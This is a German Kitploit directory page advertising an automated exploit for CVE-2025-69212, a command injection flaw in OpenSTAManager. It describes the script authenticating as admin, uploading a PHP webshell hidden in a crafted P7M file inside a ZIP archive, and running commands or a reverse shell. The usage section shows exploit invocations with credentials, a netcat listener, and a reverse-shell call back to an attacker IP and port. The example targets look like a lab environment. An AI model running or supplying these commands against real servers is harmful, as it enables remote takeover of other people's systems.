Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-69212-Exploit — Automatisierter Exploit für die Befehlsinjektion CVE-2025-69212 in OpenSTAManager mit Admin-Authentifizierung, Hochladen bösartiger ZIP-Dateien sowie Reverse-Shell- oder Befehlsausführung. | Kitploit
Tools/GitHubGitHub/pasindu-sd/cve-2025-69212-exploit
ExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHubpasindu-sd/cve-2025-69212-exploit

CVE-2025-69212-Exploit

Automatisierter Exploit für die Befehlsinjektion CVE-2025-69212 in OpenSTAManager mit Admin-Authentifizierung, Hochladen bösartiger ZIP-Dateien sowie Reverse-Shell- oder Befehlsausführung.

Repository anzeigen
vor 4 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-69212 - OpenSTAManager P7M Befehlsinjektions-Exploit

Ein vollautomatisiertes Exploit-Skript für CVE-2025-69212, eine Befehlsinjektions-Schwachstelle in OpenSTAManager. Dieses Skript authentifiziert sich mit Admin-Zugangsdaten, lädt eine schädliche PHP-Webshell über eine präparierte P7M-Datei in einem ZIP-Archiv hoch und ermöglicht die Ausführung von Befehlen oder eine Reverse Shell.

Funktionen

  • Automatisierte Authentifizierung.
  • Erzeugung und Upload einer schädlichen ZIP-Datei (invoice.p7m-Injektion).
  • Base64-Kodierung von Befehlen, um Probleme mit Sonderzeichen zu vermeiden.
  • Argumente für Reverse Shell und Einzelbefehlsausführung.

Verwendung

root@kitploit:~
python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -r <LHOST> <LPORT>

Beispiele:

Einen einzelnen Befehl ausführen:

root@kitploit:~
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -c 'id'

Reverse Shell erhalten:

root@kitploit:~
# Start your netcat listener in another terminal: nc -lvnp 4444 # Run the exploit: python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -r 10.10.14.1 4444
Tool herunterladen